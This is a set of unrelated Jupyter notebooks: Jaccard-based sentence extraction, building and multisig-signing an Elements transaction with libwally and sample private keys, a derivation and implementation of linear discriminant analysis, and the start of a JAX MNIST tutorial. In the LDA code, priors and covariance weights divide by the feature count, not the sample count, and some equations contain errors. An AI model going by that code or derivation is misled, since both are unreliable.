# Extract relevant sentences In this notebook a method is constructed to extract relevant sentences from a given text and the corresponding abstract. For this method, a score of similarity between sentences would be useful. The Jaccard index is used on top of a BOW (Bag-of-Words) model of a sentence. The Jaccard index is defined as follows on two sets $A$ and $B$: $J(A, B) = \frac{|A \cap B|}{|A \cup B|}$ It is a score between $0$ and $1$ and is $1$ if all elements of $A$ are equal to all elements of $B$. The score equals $0$ if every element of $A$ differs from any element of $B$. Therefore, it is a measure for overlap. It is important to keep the sentence comparison as fast as possible, since it is used on every training document. ``` import sys sys.path.append('..') import nltk import unidecode import re from utils import compute_jaccard_index import numpy as np ``` In the next cell, a few examples are defined. One of the examples is a sentence in a different order and one of the examples is completely different from the original. ``` examples = [ ('This is a test sentence.', 'This sentence is a test.'), ('This is a Jupyter Notebook.', 'All dogs are animals.') ] ``` The overlap scores for each of the examples are computed in the next cell. The `clean_word` method removes accents and non-alphabetic characters. By doing so, punctiation symbols are removed from the Bag-of-Words which is desired. Otherwise, most of the scores are non-zero for completely different sentences. 
``` clean_word = lambda word: re.sub(r'[^a-z]+', '', unidecode.unidecode(word).lower()) for sentence1, sentence2 in examples: print('Comparing "%s" to "%s":' % (sentence1, sentence2)) words1 = {clean_word(word) for word in nltk.word_tokenize(sentence1) if len(clean_word(word)) > 0} words2 = {clean_word(word) for word in nltk.word_tokenize(sentence2) if len(clean_word(word)) > 0} jaccard_index = compute_jaccard_index(words1, words2) print('- Unique words in first sentence: %s' % words1) print('- Unique words in second sentence: %s' % words2) print('- Jaccard index: %.2f' % jaccard_index) print() ``` Now this approach is tested on a real-world example consisting of both an abstract and the full text. ``` text = """The domestic dog (Canis lupus familiaris or Canis familiaris) is a member of the genus Canis (canines), which forms part of the wolf-like canids, and is the most widely abundant terrestrial carnivore. The dog and the extant gray wolf are sister taxa as modern wolves are not closely related to the wolves that were first domesticated, which implies that the direct ancestor of the dog is extinct. The dog was the first species to be domesticated and has been selectively bred over millennia for various behaviors, sensory capabilities, and physical attributes. Their long association with humans has led dogs to be uniquely attuned to human behavior and they are able to thrive on a starch-rich diet that would be inadequate for other canid species. New research seems to show that dogs have mutations to equivalent genetic regions in humans where changes are known to trigger high sociability and somewhat reduced intelligence. Dogs vary widely in shape, size and colors. Dogs perform many roles for people, such as hunting, herding, pulling loads, protection, assisting police and military, companionship and, more recently, aiding handicapped individuals and therapeutic roles. 
This influence on human society has given them the sobriquet "man's best friend".""" abstract = """The dog was the first species to be domesticated. Dogs vary widely in shape, size and colors.""" print('Text:') print('-' * 80) print(text) print('-' * 80) print() print('Abstract:') print('-' * 80) print(abstract) print('-' * 80) for sentence1 in nltk.sent_tokenize(abstract): scores = [] text_sentences = nltk.sent_tokenize(text) for sentence2 in text_sentences: words1 = {clean_word(word) for word in nltk.word_tokenize(sentence1) if len(clean_word(word)) > 0} words2 = {clean_word(word) for word in nltk.word_tokenize(sentence2) if len(clean_word(word)) > 0} scores.append(compute_jaccard_index(words1, words2)) related_indices = set() if np.max(scores) > 0.: related_indices.add(np.argmax(scores)) for index, score in enumerate(scores): if score > 0.6: related_indices.add(index) print('Sentence in abstract: "%s"' % sentence1) print('-' * 80) for index in related_indices: print('Related sentence in text: "%s"' % text_sentences[index]) print('-' * 80) print() ``` There is not a straightforward algorithm to compute relatedness between two sentences. But this is a greedy approach which is required for fast preprocessing. It might introduce some amount of noise. Now lets test it on a different example. 
``` text = """While architects have publicly proclaimed the World Trade Center site proposals displayed at the Winter Garden in Lower Manhattan as the greatest architecture show ever, many have privately expressed reservations about the designs' details, the handling of the competition and even the spotlight in which the contestants now stand.\n\n ''Architecture is finally having a visible presence, perhaps too visible,'' said Ricardo Scofidio of Diller & Scofidio in Manhattan.\n\n \n\n \n\n Many architects fear that the attention and intensity given to the World Trade Center designs will greatly affect the project.\n\n \n\n \n\n While architects have publicly proclaimed the World Trade Center site proposals displayed at the Winter Garden in Lower Manhattan as the greatest architecture show ever, many have privately expressed reservations about the designs' details, the handling of the competition and even the spotlight in which the contestants now stand.\n\n ''Architecture is finally having a visible presence, perhaps too visible,'' said Ricardo Scofidio of Diller & Scofidio in Manhattan.\n\n The popular image of the architect as a creative genius whipping up great designs on a cocktail napkin is at odds with the reality. More often, architects say, great design is the result of constant, sometimes painful give-and-take between the architect and the client. Letting the public in on the process from the start, even as spectators, has pulled back the veil on a ritual that is most often conducted in the hush of boardrooms and private offices.\n\n By contrast, the Lower Manhattan Development Corporation announced that its design priorities for the site would be determined ''by conducting the most comprehensive public outreach campaign ever undertaken.'' The power of public opinion to sway the process was amply demonstrated in July when six initial site plans were universally rejected. 
In this, the second round, the public has been treated to front-row seats: the presentations by the seven competing architectural teams were televised live for more than three hours, and an exhibition of their models, renderings and video walk-throughs was open to the public almost immediately. Several architectural institutions have stepped in quickly to arrange their own forums, discussion groups and exhibitions on the process, and television networks have devoted unusual amounts of air time to explaining site plans and computer-animated design.\n\n Architects ''presenting on TV has never happened before,'' Mr. Scofidio added. ''But at this phase, letting the public say what it likes and doesn't like will only make the water muddier,'' he said, explaining that what may be a great spectacle was no way to select a design.\n\n Bill Lacy, a design consultant and adviser to the jury on architecture's highest honor, the Pritzker Prize, said that the Lower Manhattan redevelopment was ''far too important to be judged by public opinion poll.''\n\n ''I feel sorry for these architects designing in a fish bowl,'' he continued. ''The first team did a credible job but was crucified by being exposed to the public prematurely. People are so eager for something positive to happen, but land use and massing studies are never exciting. You can't design for seven million clients.''\n\n Mindful of the effort involved in preparing such complex and historically significant designs in just eight weeks (and with fees of only $40,000), the 16 architects interviewed for this article were loath to single out any team's design. But they did not hesitate to criticize the process as too exposed and the requirements as too vague.\n\n The attention and its intensity are mixed blessings, said some architects, who worried that some of the more implausible designs might be taken literally, leaving the entire profession open to ridicule and condemnation. 
''There is something a little grotesque in the interpretation of ground zero as a lucky break for art,'' Leon Wieseltier, literary editor of The New Republic, said last September in a debate with Daniel Libeskind, one of the competing architects, at Columbia University.\n\n The development corporation has frequently said that the object of the competition, a master land-use plan, is not to ''include the detailed architecture of individual structures.'' But many architects worry that the teams' detailed models and impressively realistic video presentations will encourage the public to perceive them as concrete plans.\n\n Bernard Tschumi, a semifinalist in the competition and the dean of the Columbia Graduate School of Architecture, Planning and Preservation, described the process as backward. ''They are starting with a design and hope to arrive at a program,'' he said. ''It strikes me as unusual. And since each design is based on its own premises, you really can't compare them to each other at all. The ambiguity is not right.''\n\n While some architects championed the competition as a way to educate the public about the importance of architecture, many faulted the proposals for the way the buildings met the ground and integrated with the city.\n\n ''There should be more talk about activities, not buildings,'' said the architect Denise Scott Brown of Venturi, Scott Brown & Associates in Philadelphia. ''A great deal of money will be spent quickly on the transit system, and that will affect what else happens. 
All those people coming up out of the subway will surely affect the design.'' She said she wasn't sure that factor was reflected in the proposals, ''while, in fact, it should be the generator of these designs.''\n\n Other architects said too much creative vision was expended on towers and not enough on street-level elements.\n\n ''The ground plan and infrastructure are surprisingly conservative in contrast to the boldness of the architecture,'' said Ralph Lerner, a Princeton, N.J., architect and former dean of the Princeton University School of Architecture, who is now working on the design of several areas adjacent to the World Trade Center site. ''There weren't many new thoughts on how to treat ground transportation.''\n\n Many architects, however, commended the building proposals for incorporating the latest innovations in energy efficiency. ''This will be the first time that European daring in ecological issues has been introduced at such a scale in the U.S.,'' said Raymond W. Gastil, executive director of the Van Alen Institute, a nonprofit organization devoted to increasing awareness of public architecture, ''but it will create new standards for all skyscrapers.''\n\n The Van Alen Institute recently published a report, ''Information Exchange: How Cities Renew, Rebuild and Remember,'' exploring how seven cities, including Beirut, Sarajevo and Berlin, rebuilt themselves in the wake of both natural and political disasters.\n\n As for building height, architects' opinions varied about what was appropriate for structures that would stand not in, but next to, the footsteps of the lanky twin towers.\n\n ''I'm offended by everyone reaching to the sky again,'' said Will Bruder, an architect in Phoenix who focuses on environmental and recycling issues. Of the tall designs, he found Mr. Libeskind's 1,776-foot tapering tower the most convincing. ''At least he reached up to the sky with sculpture instead of a bulky mass,'' Mr. 
Bruder said.\n\n Did any of the competitors succeed at reinventing the skyscraper for a new era? Only if you've never seen Hong Kong, Mr. Lerner said. United Architects' tall, angled structures, which combined into a single public floor high in the sky, were the only proposals suggesting a new way of thinking about large buildings in groups, he added.\n\n Hugh Hardy of Hardy Holzmann Pfeiffer in Manhattan, who did not participate in the competition, said he was not convinced that a new kind of skyscraper was possible at this time. The circumstances that created landmarks like the Chrysler and Empire State buildings were different, he said. ''Not in our lifetime has anyone been able to figure out what New York should be,'' Mr. Hardy explained. ''We're all out of practice, and there's no powerful leadership. Without someone in charge, it's all going to have to be worked out each step of the way.''\n\n All the architects wondered how the development corporation would proceed. The interested public, already well informed on the issues, has still more opportunities to learn. On Monday the Architectural League will open an exhibition that is like a continuing public tutorial. It will display a range of documents connected to the design proposals, from the architects' video presentations to the reactions of the European news media.\n\n The exhibition is intended to be ''an archive of the process,'' said Rosalie Genevro, the league's executive director, and it will be updated as more materials become available. ''The first round was so bland, there was nothing to talk about,'' she said. ''Now there's so much more to look at and to sort out. 
And there's more emotion.'' The exhibition will run through the end of February, when, the development corporation announced, it will adopt a final master land-use plan and undertake a competition for a ground zero memorial.\n\n On Tuesday Architectural Record magazine is sponsoring a forum of architects and architectural critics, including Mr. Tschumi and Richard Kahan, the former chief executive of the Battery Park City Authority, who oversaw the creation of the master plan for Battery Park City in the 1980's. All the architects in the competition have been invited, along with representatives of the development corporation and Port Authority.\n\n ''It's an intellectual exercise,'' said Robert Ivy, the editor in chief of Architectural Record. ''Have there ever been so many wonderful ideas to discuss, such depth of feeling to explore? My great fear is that they are trying to make a camel with three humps.''\n\n But fears and criticism pale beside the excitement that most architects said they felt at the opportunity to see so much world-class architecture on display. ''This is a fantastic show of talent,'' said Cesar Pelli, the architect of the World Financial Center and the Winter Garden, who estimated that the architects involved must have spent as much as $4 million on their combined presentations.\n\n ''The community is getting a huge gift from these architects,'' Mr. 
Pelli said, adding, ''Of course, the architects are also getting phenomenal P.R.''""".replace('\n', ' ') abstract = """Architects privately note difficulties resulting from power of public opinion in choosing design for World Trade Center site; note unheard-of live TV broadcast presenting six initial site plans, which resulted in rejection of all designs; interviews reveal variety of opinions among architects on unusual selection process; photo (M)""" text = re.sub(r'[ ]+', ' ', text) print('Text:') print('-' * 80) print(text) print('-' * 80) print() print('Abstract:') print('-' * 80) print(abstract) print('-' * 80) for sentence1 in nltk.sent_tokenize(abstract): scores = [] text_sentences = nltk.sent_tokenize(text) for sentence2 in text_sentences: words1 = {clean_word(word) for word in nltk.word_tokenize(sentence1) if len(clean_word(word)) > 0} words2 = {clean_word(word) for word in nltk.word_tokenize(sentence2) if len(clean_word(word)) > 0} scores.append(compute_jaccard_index(words1, words2)) related_indices = set() if np.max(scores) > 0.: related_indices.add(np.argmax(scores)) for index, score in enumerate(scores): if score > 0.6: related_indices.add(index) print('Sentence in abstract: "%s"' % sentence1) print('-' * 80) for index in related_indices: print('Related sentence in text: "%s"' % text_sentences[index]) print('-' * 80) print() ``` It is interesting to see to what amount the text is reduced. A large reduction results in a great speed-up of the processing. 
```
# Build the extractive summary: for every sentence of the abstract, collect
# the text sentences with the highest Jaccard overlap.
related_sentences = []
for sentence1 in nltk.sent_tokenize(abstract):
    scores = []
    text_sentences = nltk.sent_tokenize(text)
    for sentence2 in text_sentences:
        # Bag-of-words sets (cleaned, lowercased, punctuation stripped) for both sentences.
        words1 = {clean_word(word) for word in nltk.word_tokenize(sentence1) if len(clean_word(word)) > 0}
        words2 = {clean_word(word) for word in nltk.word_tokenize(sentence2) if len(clean_word(word)) > 0}
        scores.append(compute_jaccard_index(words1, words2))
    related_indices = set()
    # Keep the single best-scoring sentence (if there is any overlap at all)...
    if np.max(scores) > 0.:
        related_indices.add(np.argmax(scores))
    # ...plus every sentence above the high-overlap threshold.
    for index, score in enumerate(scores):
        if score > 0.6:
            related_indices.add(index)
    for index in related_indices:
        related_sentences.append(text_sentences[index])
constructed_abstract = ' '.join(related_sentences)
print('Original size: %d characters' % len(text))
print('New size: %d characters' % len(constructed_abstract))
print('Compression ratio: %.2f%%' % (-100. * (len(constructed_abstract) - len(text)) / float(len(text))))
```

A large portion of the input data is neglected when it becomes possible to select what the most important sentences of a text are.

## Conclusion

If it is possible to learn which sentences to select, it is straightforward to select the salient entities. The input size is reduced significantly in this process.
github_jupyter
``` import wallycore as wally def buildTransaction(tx_inputs, tx_outputs): tx = wally.tx_init(2, 0, 1, 2) # version 2, locktime 0, 1 input, 2 outputs for tx_input in tx_inputs: wally.tx_add_input(tx, tx_input) for tx_output in tx_outputs: wally.tx_add_output(tx, tx_output) return tx def buildInput(tx_input_hex, tx_input_vout, sequence): tx_input_byte = wally.hex_to_bytes(tx_input_hex)[::-1] return wally.tx_elements_input_init(tx_input_byte, tx_input_vout, sequence, None, None, None, None, None, None, None, None, None) def buildOutput(value, asset_id, script_byte): confidential_tx_value_byte = wally.tx_confidential_value_from_satoshi(value) return wally.tx_elements_output_init(script_byte, asset_id, confidential_tx_value_byte, None, None, None) ELEMENTS_UNBLINDED_TX_PREFIX = 0x01 tx_input_hex = "53174bc15eef5b16522b5fe45cf2e147e829990dd72454ab7d2a493e220e4c36" asset_id = bytearray([ELEMENTS_UNBLINDED_TX_PREFIX]) + wally.hex_to_bytes("9e56d67dee0fbe395374572d2a389e56659380e2b58ad43081e0d3ddcab1a0f7")[::-1] script = wally.hex_to_bytes("76a9144f844a62154987b501dccfd6c504596759e9f24888ac") sequence = 0xffffffff tx_inputs = [buildInput(tx_input_hex, 0, sequence)] tx_outputs = [buildOutput(12345, asset_id, script), buildOutput(500, asset_id, None)] tx = buildTransaction(tx_inputs, tx_outputs) tx_hex = wally.tx_to_hex(tx, 0) print(tx_hex) def generateRedeemScript(private_keys, threshold): public_keys = bytearray([]) for private_key in private_keys: public_key = wally.ec_public_key_from_private_key(private_key) public_keys += public_key return wally.scriptpubkey_multisig_from_bytes(public_keys, threshold, 0) def signInputs(tx, private_keys, input_values, prev_out_scripts, sighashes): for index, (private_keys, input_value, prev_out_script, sighash) in enumerate(zip(private_keys, input_values, prev_out_scripts, sighashes)): witness_stack = wally.tx_witness_stack_init(len(private_keys) + 2) wally.tx_witness_stack_add_dummy(witness_stack, wally.WALLY_TX_DUMMY_NULL); input_value 
= wally.tx_confidential_value_from_satoshi(input_value); hash_to_sign = wally.tx_get_elements_signature_hash(tx, index, prev_out_script, input_value, sighash, wally.WALLY_TX_FLAG_USE_WITNESS) for private_key in private_keys: public_key = wally.ec_public_key_from_private_key(private_key) signature = wally.ec_sig_from_bytes(private_key, hash_to_sign, wally.EC_FLAG_ECDSA | wally.EC_FLAG_GRIND_R) der_signature = wally.ec_sig_to_der(signature) + bytearray([wally.WALLY_SIGHASH_ALL]) wally.tx_witness_stack_add(witness_stack, der_signature) wally.tx_witness_stack_add(witness_stack, prev_out_script) script_sig = bytearray([0x22, 0x00, 0x20]) + wally.sha256(prev_out_script) wally.tx_set_input_script(tx, index, script_sig) wally.tx_set_input_witness(tx, index, witness_stack) private_keys = [wally.hex_to_bytes("d23388f6ed69564cbd7518bde279bcffac2156aeea024fe527726d7b5250d461"), wally.hex_to_bytes("c1c4cfce079a36bd8d1d37b0342cc16f1bd3e5e29d5750601b27ba5e82cb6741"), wally.hex_to_bytes("2554c3ee6bea1073cfe6b9cd94328eb6c7ac510af67c1371f7e379563e02303c")] redeem_script = generateRedeemScript(private_keys, 2) signInputs(tx, [private_keys[:2]], [12845], [redeem_script], [wally.WALLY_SIGHASH_ALL]) tx_hex = wally.tx_to_hex(tx, wally.WALLY_TX_FLAG_USE_WITNESS) print(tx_hex) ```
github_jupyter
## Probabilistic Generative Models ### Linear Discriminant Analysis As we saw in the LR, we were able to explicitly model the conditional distribution of the target class given the input features. Another approaching for modeling this distribution is by implicitly modeling it by using Bayes' theorem. This approach is known as generative learning algorithm, in which model the conditional distribution of the input features of each class. Then the posterior (conditional distribution of the target class w.r.t input features) is estimated by Bayes' theorem. And this is illustrated by the following formula:- $$ \begin{align*} \begin{split} &p(t=C_1|x) = \frac{p(t=C_1,t)}{p(x)} = \frac{p(x|t=C_1)p(C_1)}{\sum_{i}p(x,t=C_i)},\\ &=\frac{p(x|t=C_1)p(C_1)}{\sum_{i}p(x|t=C_i)p(C_i)} \end{split} \end{align*} $$ One of the Generative models is the Gaussian Discriminant model(GDM) in which we try to fit to $p(x|t=C_i)$ a multi-variate distribution, and this is indicative that the features space should be made from continuous random variables. And the Gaussian distribution is fully described by its mean and covariance matrix. Therefore, GDM model can further divided into two models one is called linear discriminant analysis (LDA) model and the other one is quadratic discriminant analysis (QDA) model, the meaning of LDA will be explained in this jupyter notebook, while QDA will be explained in another jupyter notebook. ### Explaining the linear part in LDA As was shown above, the conditional distribution of input feature space given the target class can be explained by $p(t=C_1|x)=\frac{p(x|t=C_1)p(C_1)}{\sum_{i}p(x|t=C_i)p(C_i)}$. By inserting a natural logarithm and an exponential before each $p(x, t=C_i)$, one can easily express $p(t=C_i|x)$ as follows:- $p(t=C_k|x) = \frac{exp(ln(p(x|C_k)\ p(C_k)))}{\sum_{i}exp(ln(p(x|t=C_i)p(C_i)))} = \frac{exp(a_k)}{\sum_{i}exp(a_i)}$. 
Also, as was mentioned before $p(x|t=C_k)$ is assumed to be a multi-variate Gaussian that is expresses by the following formula:- $$ \begin{align*} \begin{split} p(x|t=C_k) = \frac{1}{(det(2\pi \Sigma)^{D/2}} exp(\frac{-1}{2}(x-\mu_k)^T\Sigma^{-1}(x-\mu_k)) \end{split} \end{align*} $$ Also, LDA will assume that the distribution of the features space in each class is sharing the same exact covariance matrix. The $\underline{a_k}$ vector can expresses as follows:- $$ \begin{align*} \begin{split} &a_k = ln(p(x|C_k)p(C_k)) = ln(\frac{1}{det(2\pi \Sigma)}) -\frac{1}{2}(x-\mu_k)^T\Sigma^{-1}(x-\mu_k) + ln(p(C_k)), \ where\ is\ \mu\ and\ x\ are\ vectors\\ &a_k = ln(\frac{1}{det(2\pi \Sigma)}) -\frac{1}{2}\Big( x^T\Sigma^{-1}x - x^T\Sigma^{-1}\mu_k-\mu_k^{T}\Sigma^{-1}x+\mu_k^T\Sigma^{-1}\mu_k\Big) + ln(p(C_k));\ let\ t=\Sigma^{-1}\mu_k\ ,\ \Sigma^T=\Sigma and\ utilize\ a^Tb=b^Ta\\ &a_k= ln(\frac{1}{det(2\pi \Sigma)}) -\frac{1}{2}x^T\Sigma^{-1}x + \mu_k^T\Sigma^{-1}x -\frac{1}{2}\mu_k^T\Sigma^{-1}\mu_k + ln(p(C_k)) \end{split} \end{align*} $$ And now we are equipped with the necessary tool to be able to see the linearity with respect to $\underline{x}$, this can be derives as follows:- $$ \begin{align*} \begin{split} &p(C_k|x) = \frac{exp\Big( exp(ln(\frac{1}{det(2\pi \Sigma)}) -\frac{1}{2}x^T\Sigma^{-1}x + \mu_k^T\Sigma^{-1}x -\frac{1}{2}\mu_k^T\Sigma^{-1}\mu_k + ln(p(C_k))) \Big)}{\sum_{i}\Big( exp\Big( ln(\frac{1}{det(2\pi \Sigma)}) -\frac{1}{2}x^T\Sigma^{-1}x + \mu_i^T\Sigma^{-1}x -\frac{1}{2}\mu_i^T\Sigma^{-1}\mu_i + ln(p(C_i)) \Big) \Big)};\\ & we\ take\ ln(\frac{1}{det(2\pi \Sigma)}) -\frac{1}{2}x^T\Sigma^{-1}x\ as\ a common\ term\ from\ the\ denominator\\ &and\ we\ need\ to\ utilize\ exp(a+b)=exp(a)exp(b)\\ &p(C_k|x) = \frac{exp\Big( \mu_k^T\Sigma^{-1}x -\frac{1}{2}\mu_k^T\Sigma^{-1}\mu_k + ln(p(C_k) \Big)}{\sum_{i}exp\Big( \mu_k^T\Sigma^{-1}x -\frac{1}{2}\mu_k^T\Sigma^{-1}\mu_k + ln(p(C_k) \Big)}\\ &a_k(x) =\underline{w}^T\underline{x} + w_{k0} = 
(\Sigma^{-1}\mu_k)^Tx +\frac{-1}{2}\mu_k^T\Sigma^{-1}\mu_k + ln(p(C_k)) \end{split} \end{align*} $$ As can be seen from the last equation, we can express $a_k$ as a linear combination of the input features, and from here the term linear was coined. Also, this indicates that the decision boundary would be linear, similar to the case of logistic regression and softmax regression. The relationship between LDA and logistic regression will be discussed later. ### Maximum Likelihood Solution This method needs to estimate three parameters, and these parameters are:- $p(C_k)=\phi_k$, which is the proportion of observations belonging to class k; $\mu_k$, which is the mean vector of the input features for the k-th class; and $\Sigma$, which is the covariance matrix shared among all classes. Because we have k classes, we need to utilize the indicator function $\textit{I}(c=k)$, which is equal to 1 if $c$ equals $k$ and zero otherwise. Therefore, the log-likelihood can be expressed as follows:- $$ \begin{align*} \begin{split} &\ell(\mu_1, ... \mu_k, \Sigma, \phi_1, ... \phi_k) = log\Big( p(\underline{t}|\underline{x}, \phi^s, \mu^s, \Sigma) \Big)\\ &=log\Big( \prod_{n=1}^{N}\big( \prod_{k=1}^{K}p(x|C_k;.)p(C_k) \big) \Big)\\ &=log\Big( \prod_{n=1}^{N}\big( \prod_{k=1}^{K}(\phi_k \mathcal{N}(x_n;\mu_k, \Sigma))^{\textit{I}(C_k = t_n)} \big) \Big) \end{split} \end{align*} $$ So, we need to maximize the log-likelihood with respect to $\phi^s$, $\mu^s$ and $\Sigma$, and the resulting values for those parameters that maximize the log-likelihood are:- $$ \begin{align*} \begin{split} &\phi_k = \frac{N_k}{N_1 + ... + N_K}\\ &\mu_k = \frac{1}{N_k}\sum_{n=1}^{N}\textit{I}(t_n = C_k)\, \underline{x_n}\\ &\Sigma = \frac{N_1}{N}\Sigma_1+ ... 
+\frac{N_K}{N}\Sigma_K\\ &\Sigma_k =\frac{1}{N_k}\sum_{n \in C_k}(x_n - \mu_k)(x_n - \mu_k)^T \end{split} \end{align*} $$ ### Make prediction After learning the parameters of the LDA model, we can make predictions by utilizing the following formula:- $$ \begin{align*} p(C_k|x) = \frac{exp\Big( \mu_k^T\Sigma^{-1}x -\frac{1}{2}\mu_k^T\Sigma^{-1}\mu_k + ln(\phi_k) \Big)}{\sum_{i}exp\Big( \mu_i^T\Sigma^{-1}x -\frac{1}{2}\mu_i^T\Sigma^{-1}\mu_i + ln(\phi_i) \Big)} \end{align*} $$ In which we choose the class that achieves the highest posterior value. ### Relationship between LDA and Logistic regression We will restrict LDA to deal with a 2-class dataset in order to compare it to logistic regression. The derivation of the relationship can be seen as follows:- As can be seen from above, LDA (or GDA in general) is equivalent to LR when the assumption that $p(x|C)$ is normally distributed holds. And if this assumption holds, LDA will be faster than LR due to the simpler manner of estimating its parameters. But if the assumption doesn't hold and we have a small data set (by the Central Limit Theorem), LR would achieve better performance than LDA. 
``` %matplotlib inline import numpy as np import sklearn.preprocessing import sklearn.datasets import pandas as pd import sklearn.model_selection import numpy.random import math import sklearn.metrics #X, y = sklearn.datasets.load_iris(return_X_y=True) X, y = sklearn.datasets.load_wine(return_X_y=True) X_train, X_test, y_train, y_test = sklearn.model_selection.train_test_split(X, y, random_state=42) standard = sklearn.preprocessing.StandardScaler() X_train = standard.fit_transform(X_train) training_data = np.c_[X_train, y_train]#All of the features are continuous, so, no need to use one-hot encoder and we can directly standard normalize the features of the data set X_test = standard.transform(X_test) test_data = np.c_[X_test, y_test] print(training_data.shape) print(test_data.shape) k = 3 X_train, y_train = (training_data[:, 0:-1], training_data[:, -1]) X_test, y_test = (test_data[:, 0:-1], test_data[:, -1]) class LDA_Model(object): def __init__(self, X_train, y_train, k): self.X_train = X_train self.y_train = y_train self.Mu = [mu for mu in [np.zeros((X_train.shape[1], 1))]*k] self.Sigma = [sigma for sigma in [np.zeros((X_train.shape[1], X_train.shape[1]))]*k] self.Sigma_total = np.zeros((self.X_train.shape[1], self.X_train.shape[1])) self.phis = [phi for phi in np.zeros((k, 1))] self.m = (self.X_train).shape[0] self.n = (self.X_train).shape[1] self.K = k def fit(self): data = pd.DataFrame(np.c_[self.X_train, self.y_train]) indexs = data.columns class_observations = [] N = [] for k in range(0, self.K): class_observations.append(data[data[indexs[-1]] == k]) N.append(class_observations[k].shape[0]) for k in range(0, self.K): temp = (class_observations[k]).to_numpy() mean_temp = (np.mean(temp[:, 0:-1], axis=0)).reshape(-1, 1) assert(self.Mu[k].shape == mean_temp.shape) self.Mu[k] = mean_temp.copy() self.Sigma[k] = np.cov((temp[:, 0:-1]).T) for k in range(0, self.K): self.phis[k] = N[k]/self.n self.Sigma_total = self.Sigma_total + (N[k]/self.n) * self.Sigma[k] return 
self.phis, self.Mu, self.Sigma_total def predict_observation(self, x): prediction = np.zeros((1, self.K)) denominator = 0 s_inv = np.linalg.inv(self.Sigma_total) for k in range(0, self.K): t1 = np.dot(self.Mu[k].T, np.dot(s_inv, x)) t2 = (-1/2)* np.dot(self.Mu[k].T, np.dot(s_inv, self.Mu[k])) t3 = np.log(self.phis[k]) temp = np.exp( t1 + t2 + t3) #print(temp.shape) #assert(denominator.shape == temp.shape) denominator = denominator + temp #print(denominator) #print(prediction.shape) for k in range(0, self.K): t1 = np.dot(self.Mu[k].T, np.dot(s_inv, x)) t2 = (-1/2)* np.dot(self.Mu[k].T, np.dot(s_inv, self.Mu[k])) t3 = np.log(self.phis[k]) temp = np.exp(t1 + t2 + t3) #print(temp.shape) #assert(temp.shape == denominator.shape) prediction[:, k] = (np.divide(temp, denominator)) return np.argmax(prediction) def predict_dataset(self, X, y): prediction = np.zeros((X.shape[0], 1)) for i in range(0, X.shape[0]): prediction[i, 0] = self.predict_observation(X[i, :]) return prediction LDA = LDA_Model(X_train, y_train, k=3) phis, Mu, Sigma_total = LDA.fit() prediction = LDA.predict_dataset(X_train, y_train) print("Performance on the training set") print(sklearn.metrics.confusion_matrix(y_train, prediction)) #print(f"precision:{sklearn.metrics.precision_score(y_train, prediction):0.3f}, recall:{sklearn.metrics.recall_score(y_train, prediction):0.3f}") prediction = LDA.predict_dataset(X_test, y_test) print("Performance on the test set") print(sklearn.metrics.confusion_matrix(y_test, prediction)) ``` ### References * Chapter 1, chapter 2 and Chapter 4 from Bishop, C. (2006). Pattern Recognition and Machine Learning. Cambridge: Springer. * Andrew Ng, Lec 4: (https://www.youtube.com/watch?v=nLKOQfKLUks) * Andrew Ng, Lec 5: (https://www.youtube.com/watch?v=qRJ3GKMOFrE)
github_jupyter
##### Copyright 2018 Google LLC. Licensed under the Apache License, Version 2.0 (the "License"); Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at https://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. # Training a Simple Neural Network, with tensorflow/datasets Data Loading _Forked from_ `neural_network_and_data_loading.ipynb` ![JAX](https://raw.githubusercontent.com/google/jax/master/images/jax_logo_250px.png) Let's combine everything we showed in the [quickstart notebook](https://colab.research.google.com/github/google/jax/blob/master/notebooks/quickstart.ipynb) to train a simple neural network. We will first specify and train a simple MLP on MNIST using JAX for the computation. We will use the `tensorflow/datasets` data loading API to load images and labels (because it's pretty great, and the world doesn't need yet another data loading library :P). Of course, you can use JAX with any API that is compatible with NumPy to make specifying the model a bit more plug-and-play. Here, just for explanatory purposes, we won't use any neural network libraries or special APIs for building our model. ``` import jax.numpy as jnp from jax import grad, jit, vmap from jax import random ``` ### Hyperparameters Let's get a few bookkeeping items out of the way. 
``` # A helper function to randomly initialize weights and biases # for a dense neural network layer def random_layer_params(m, n, key, scale=1e-2): w_key, b_key = random.split(key) return scale * random.normal(w_key, (n, m)), scale * random.normal(b_key, (n,)) # Initialize all layers for a fully-connected neural network with sizes "sizes" def init_network_params(sizes, key): keys = random.split(key, len(sizes)) return [random_layer_params(m, n, k) for m, n, k in zip(sizes[:-1], sizes[1:], keys)] layer_sizes = [784, 512, 512, 10] param_scale = 0.1 step_size = 0.01 num_epochs = 10 batch_size = 128 n_targets = 10 params = init_network_params(layer_sizes, random.PRNGKey(0)) ``` ### Auto-batching predictions Let us first define our prediction function. Note that we're defining this for a _single_ image example. We're going to use JAX's `vmap` function to automatically handle mini-batches, with no performance penalty. ``` from jax.scipy.special import logsumexp def relu(x): return jnp.maximum(0, x) def predict(params, image): # per-example predictions activations = image for w, b in params[:-1]: outputs = jnp.dot(w, activations) + b activations = relu(outputs) final_w, final_b = params[-1] logits = jnp.dot(final_w, activations) + final_b return logits - logsumexp(logits) ``` Let's check that our prediction function only works on single images. 
``` # This works on single examples random_flattened_image = random.normal(random.PRNGKey(1), (28 * 28,)) preds = predict(params, random_flattened_image) print(preds.shape) # Doesn't work with a batch random_flattened_images = random.normal(random.PRNGKey(1), (10, 28 * 28)) try: preds = predict(params, random_flattened_images) except TypeError: print('Invalid shapes!') # Let's upgrade it to handle batches using `vmap` # Make a batched version of the `predict` function batched_predict = vmap(predict, in_axes=(None, 0)) # `batched_predict` has the same call signature as `predict` batched_preds = batched_predict(params, random_flattened_images) print(batched_preds.shape) ``` At this point, we have all the ingredients we need to define our neural network and train it. We've built an auto-batched version of `predict`, which we should be able to use in a loss function. We should be able to use `grad` to take the derivative of the loss with respect to the neural network parameters. Last, we should be able to use `jit` to speed up everything. ### Utility and loss functions ``` def one_hot(x, k, dtype=jnp.float32): """Create a one-hot encoding of x of size k.""" return jnp.array(x[:, None] == jnp.arange(k), dtype) def accuracy(params, images, targets): target_class = jnp.argmax(targets, axis=1) predicted_class = jnp.argmax(batched_predict(params, images), axis=1) return jnp.mean(predicted_class == target_class) def loss(params, images, targets): preds = batched_predict(params, images) return -jnp.mean(preds * targets) @jit def update(params, x, y): grads = grad(loss)(params, x, y) return [(w - step_size * dw, b - step_size * db) for (w, b), (dw, db) in zip(params, grads)] ``` ### Data Loading 